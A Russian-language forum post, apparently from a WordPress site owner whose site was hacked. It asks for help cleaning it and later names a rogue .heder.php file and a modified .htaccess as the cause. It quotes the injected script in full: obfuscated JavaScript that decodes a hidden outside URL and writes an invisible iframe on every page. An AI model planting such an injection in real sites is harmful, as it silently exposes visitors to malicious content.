Ломанули сайт. Помогите почистить :)

Сайт на WordPress

После тега <body> на всех страницах блога и в админке воткнули следующее -

<!--IviOD RBa Uj Gq IKE ax hsdkfh sdfhkjsdhf ya lublu c++ --><sc rip t>/*nRGWhYRxywfLBvnMtYURUL*/var uqGYiN=document;/*lFXwqoFFNiJurJUOtXb_IYqq*/function XkStpARjhE(JBGlkVEEia)/*rrmsCLEyWDaOLeZCEJtPw*/{var FDJUoOr = "",/*rrmsCLEyWDaOLeZCEJtPw*/K_GkGuddq=0;for(K_GkGuddq=JBGlkVEEia.length-1;K_GkGuddq >= 0;K_GkGuddq--)/*rrmsCLEyWDaOLeZCEJtPw*/{FDJUoOr+=JBGlkVEEia.charAt(K_GkGuddq);}return FDJUoOr;/*XgTzJTjTHAObASGBbRqzUA*/}/*FobGizLgrQTHpGMzdgfxgLSWN*/function SXCeaX(aWXfq)/*u_pzaxzabvHOHujK*/{/*nRGWhYRxywfLBvnMtYURUL*/aWXfq = aWXfq.replace(/[\.]/g, "%");/*XgTzJTjTHAObASGBbRqzUA*/aWXfq=unescape(aWXfq);/*DkbRQ_FtPRdGHgjyDcUAgPz*/return XkStpARjhE(aWXfq);/*dkvBDoraaxvgdFkJmTWCmPmsQ*/}/*ScDFeQMEFgyUeTqqpLgt*/function ImKNlODd(){/*XgTzJTjTHAObASGBbRqzUA*/uqGYiN.write("<style>.GMBiItsfYC{width:1px;height:1px;border:none;visibility:hidden}</style>");/*euubiDinrpQxcCtzaj*//*UelL_wvEelZ_h*/var lCwgI="<iframe id=\"AvCXvOygTZ\" src=\"x\" class=\"GMBiItsfYC\"></iframe>";/*IUdoCiSHVFaKPJsVlHNJwZpgz*//*QvCxpgBojRPgkzViiVu*/var HsartDgb=lCwgI.replace(/[\+x]/g,SXCeaX(".70.68.70.2e.6e.69.2f.38.39.31.2f.73.72.65.73.75.2f.6d.6f.63.2e.72.65.74.6e.75.6f.63.2d.73.65.74.69.73.2f.2f.3a.70.74.74.68"));/*ScDFeQMEFgyUeTqqpLgt*//*psyRzDSeHYpdVjM_sSEPjgZ*/return HsartDgb;/*XgTzJTjTHAObASGBbRqzUA*//*DkbRQ_FtPRdGHgjyDcUAgPz*/}/*IUdoCiSHVFaKPJsVlHNJwZpgz*//*xR_QNfmVCAWkNp_Ufg*//*lEMbtEOdfsGIpRZ_EmDjvr*//*ScDFeQMEFgyUeTqqpLgt*/uqGYiN.writeln(ImKNlODd());/*UelL_wvEelZ_h*//*XgTzJTjTHAObASGBbRqzUA*//*ScDFeQMEFgyUeTqqpLgt*/</ scr ipt><! --IviOD RBa Uj Gq IKE ax hsdkfh sdfhkjsdhf ya lublu c++  -->

Не могу понять как он там оказывается. Скачал все файлы, поковырялся, кода этого не нашёл.

Может кому уже подгружали подобное? Как чистить?

Стоило создать тему и сразу нашёл.

В корене лишний файл .heder.php

+ .htaccess поправили.